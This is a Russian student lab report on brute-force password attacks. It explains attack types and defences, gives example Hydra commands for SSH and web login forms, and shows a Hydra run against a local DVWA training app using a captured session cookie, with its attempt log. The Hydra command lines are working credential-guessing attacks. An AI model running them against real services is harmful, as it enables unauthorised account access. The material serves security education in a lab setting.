

# **Индивидуальный проект - этап 3**

**Использование Hydra**

Алёна Дрожжанова

# Содержание

|          |  |           |
|----------|--|-----------|
| <b>1</b> | <b>Цель работы</b>                         | <b>4</b>  |
| <b>2</b> | <b>Введение</b>                            | <b>5</b>  |
| 2.1      | Брут-форс . . . . .                        | 5         |
| 2.1.1    | Основные виды атак брут-форс . . . . .     | 5         |
| 2.1.2    | Как защититься от атак брут-форс . . . . . | 6         |
| 2.2      | Hydra . . . . .                            | 7         |
| 2.2.1    | Основные характеристики Hydra . . . . .    | 7         |
| 2.2.2    | Примеры использования Hydra . . . . .      | 8         |
| <b>3</b> | <b>Выполнение лабораторной работы</b>      | <b>9</b>  |
| <b>4</b> | <b>Вывод</b>                               | <b>12</b> |

# List of Figures

|     |                              |    |
|-----|------------------------------|----|
| 3.1 | Страница веб-формы . . . . . | 9  |
| 3.2 | Заголовок запроса . . . . .  | 9  |
| 3.3 | Результат подбора . . . . .  | 11 |

# 1 Цель работы

Целью данной работы является изучение атак типа брут-форс и инструмента hydra.

## 2 Введение

### 2.1 Брут-форс

Атака брут-форс (англ. brute force attack) — это метод взлома, основанный на последовательном переборе возможных комбинаций значений (паролей, ключей шифрования и т. д.), чтобы подобрать правильное значение и получить несанкционированный доступ.

Атаки брут-форс являются одним из самых простых, но эффективных способов взлома учетных записей, если системы не защищены должным образом. Сильные пароли, ограничения на количество попыток входа и двухфакторная аутентификация могут значительно уменьшить вероятность успешной атаки.

#### 2.1.1 Основные виды атак брут-форс

1. **Прямой брут-форс** Это классический метод, при котором осуществляется полный перебор всех возможных комбинаций символов до тех пор, пока не будет найден правильный пароль.

**Пример:** Если длина пароля 4 символа и каждый символ может быть буквой английского алфавита (всего 26 букв), то количество всех возможных паролей составит  $26^4 = 456\,976$ .

2. **Словарная атака** В этой атаке используется предварительно подготовленный словарь наиболее распространенных паролей или комбинаций. В отличие

от прямого брут-форса, здесь перебираются только “умные” комбинации, сокращая количество попыток.

**Пример:** Использование списка популярных паролей, таких как 123456, password, qwerty и других.

3. **Гибридная атака** Сочетает словарную атаку с частичным перебором. Например, сначала проверяются пароли из словаря, а затем к ним добавляются различные числовые или символьные комбинации.

**Пример:** Попытки подобрать пароли вида password123, qwerty2024, где к стандартным паролям добавляются числа.

4. **Атака с использованием «радужных таблиц» (Rainbow Tables)** В этом случае вместо прямого перебора используется готовая база значений хешей для паролей и их соответствий. Атака эффективна только против плохо защищенных систем, где пароли не солятся.

**Пример:** Использование таблицы хешей для мгновенного поиска совпадений по хешу пароля.

## 2.1.2 Как защититься от атак брут-форс

### 1. Использование сложных паролей

- Рекомендуется использовать пароли длиной не менее 12 символов, содержащие буквы разного регистра, цифры и специальные символы.

### 2. Ограничение количества попыток ввода

- Ввод ограничения на количество попыток ввода пароля существенно снижает шансы успешной атаки брут-форс.

### 3. Двухфакторная аутентификация (2FA)

- Второй фактор подтверждения (SMS, приложения-аутентификаторы) добавляет дополнительный уровень защиты.

#### 4. Использование CAPTCHA

- Применение CAPTCHA усложняет автоматизацию процесса перебора паролей.

#### 5. Мониторинг активности

- Регулярный мониторинг попыток входа в систему может помочь выявить подозрительные активности и предотвратить атаки.

## 2.2 Hydra

**Hydra** — это мощный инструмент для проведения атак брут-форс на сетевые сервисы. Программа разработана для быстрого и эффективного подбора паролей путем перебора различных комбинаций на множестве протоколов. Hydra поддерживает как простые словарные атаки, так и более сложные сценарии.

### 2.2.1 Основные характеристики Hydra

- **Многофункциональность:** Hydra поддерживает множество сетевых протоколов, таких как:
  - SSH
  - FTP
  - HTTP/HTTPS
  - Telnet
  - RDP (Remote Desktop Protocol)
  - POP3, IMAP
  - MySQL, PostgreSQL, Oracle
  - SMB (Windows Share)

– и многие другие.

- **Высокая скорость:** Программа оптимизирована для выполнения атак с максимальной скоростью. Она использует несколько потоков для параллельного подбора паролей, что значительно ускоряет процесс.
- **Поддержка словарных атак:** Hydra использует словари паролей для проведения атак. Словари можно настроить, чтобы программа сначала пробовала наиболее популярные или предположительные комбинации.
- **Масштабируемость:** Программа может работать в различных сетях, поддерживая распределенные атаки для использования на множестве машин.

## 2.2.2 Примеры использования Hydra

### 1. Атака на SSH

```
hydra -l admin -P passwords.txt ssh://192.168.1.100
```

- `-l admin` — имя пользователя для входа.
- `-P passwords.txt` — файл словаря паролей.
- `ssh://192.168.1.100` — IP-адрес или хост SSH-сервера.

### 2. Атака на веб-форму (HTTP POST)

```
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:
```

- `/login.php` — путь к форме входа.
- `USER` и `PASS` — placeholders для ввода имени пользователя и пароля.
- `F=incorrect` — текст ошибки, который выводится при неправильном пароле.



## 3 Выполнение лабораторной работы

В DVWA есть страница для тестирования атак типа брут-форс.



Figure 3.1: Страница веб-формы

Запрос передается в виде GET, данные пользователя отправляются явно как параметры.

```
1 GET /DVWA/vulnerabilities/brute/?username=admin&password=123&Login=Login HTTP/1.1
2 Host: localhost
3 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
4 Accept:
5 text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 Accept-Language: en-US,en;q=0.5
7 Accept-Encoding: gzip, deflate, br
8 Connection: close
9 Referer: http://localhost/DVWA/vulnerabilities/brute/
10 Cookie: PHPSESSID=dt94ful4fn2a3ub7or0kjgqavm; security=medium
11 Upgrade-Insecure-Requests: 1
12 Sec-Fetch-Dest: document
13 Sec-Fetch-Mode: navigate
14 Sec-Fetch-Site: same-origin
15 Sec-Fetch-User: ?1
16
```

Figure 3.2: Заголовок запроса

Из запроса извлечем ссылку и cookie, чтобы использовать их для атаки.

Далее сформируем команду для запуска hydra

Команда пытается выполнить брут-форс атаку на веб-форму аутентификации, находящуюся на локальном хосте (в приложении DVWA), с использованием фиксированного логина (admin) и списка паролей, взятого из файла /usr/share/dirb/wordlists/small.txt. В случае неправильного пароля, Hydra будет продолжать подбор до тех пор, пока не подберет правильный пароль или не исчерпает все варианты.

```
hydra -l admin -P /usr/share/dirb/wordlists/small.txt localhost http-get-
```

Параметры команды:

- -l admin: Определяет, что будет использоваться фиксированное имя пользователя — admin. Вместо admin можно использовать любой другой логин или список логинов (если используется опция -L).
- -P /usr/share/dirb/wordlists/small.txt: Опция -P указывает на путь к файлу словаря паролей (small.txt). Программа будет перебирать каждый пароль из этого файла.
- localhost: Атака будет направлена на сервер, работающий на локальной машине. Если необходимо атаковать удаленный сервер, здесь указывают его IP-адрес или доменное имя.
- http-get-form: Указывает метод HTTP-запроса. В данном случае это GET-запрос. Hydra может работать как с http-get-form, так и с http-post-form (для POST-запросов).
- “/DVWA/vulnerabilities/brute/:username=<sup>USER</sup>&password=<sup>PASS</sup>&Login=Login:H=Cookie:PHPSESSID=f2q94tbasiksr9q31mlg9d4qum; security=medium:F=Username and/or password incorrect.”: Это описание того, как должен быть построен запрос и как распознавать ответ от сервера.

- “/DVWA/vulnerabilities/brute/”: Путь к странице, на которой находится форма аутентификации. В данном случае это страница приложения DVWA, уязвимого к брут-форс атакам.
- username=<sup>USER</sup>&password=<sup>PASS</sup>&Login=Login: Hydra заменит <sup>USER</sup> на заданное имя пользователя (admin в данном случае) и <sup>PASS</sup> на каждый из паролей из словаря. Login=Login — это фиксированное значение для кнопки отправки формы.
- H=Cookie: PHPSESSID=f2q94tbasiksr9q31mlg9d4qum; security=medium: Здесь задаются заголовки HTTP-запроса. В частности, используется куки с идентификатором сессии PHPSESSID=f2q94tbasiksr9q31mlg9d4qum, что позволяет Hydra оставаться аутентифицированной в текущей сессии. Также указывается уровень безопасности DVWA (security=medium).
- F=Username and/or password incorrect.: Это шаблон ошибки, который будет возвращен сервером при неправильных учетных данных. Если Hydra увидит этот текст в ответе от сервера, она продолжит попытки подбора паролей, понимая, что введенный пароль был неверным.

В результате запуска был подобран пароль

```
(user@adrozhanova)~$ hydra -l admin -P /usr/share/dirb/wordlists/small.txt localhost http-get-form "/DVWA/vulnerabilities/brute/:username='USER'&password='PASS'&Login=Login:H=Cookie: PHPSESSID=f2q94tbasiksr9q31mlg9d4qum; security=medium:F=Username and/or password incorrect." -v

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these ** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-14 07:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 959 login tries (l:1/p:959), ~60 tries per task
[DATA] attacking http-get-form://localhost:80/DVWA/vulnerabilities/brute/:username='USER'&password='PASS'&Login=Login:H=Cookie: PHPSESSID=f2q94tbasiksr9q31mlg9d4qum; security=medium:F=Username and/or password incorrect.
[ATTEMPT] target localhost - login "admin" - pass "0" - 1 of 959 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "00" - 2 of 959 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "01" - 3 of 959 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "02" - 4 of 959 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "03" - 5 of 959 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1" - 6 of 959 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "10" - 7 of 959 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "100" - 8 of 959 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1000" - 9 of 959 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123" - 10 of 959 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "2" - 11 of 959 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "20" - 12 of 959 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "200" - 13 of 959 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "2000" - 14 of 959 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "2001" - 15 of 959 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "2002" - 16 of 959 [child 15] (0/0)
```

Figure 3.3: Результат подбора

## 4 Вывод

Мы приобрели знания об атаках брут-форс и инструменте hydra.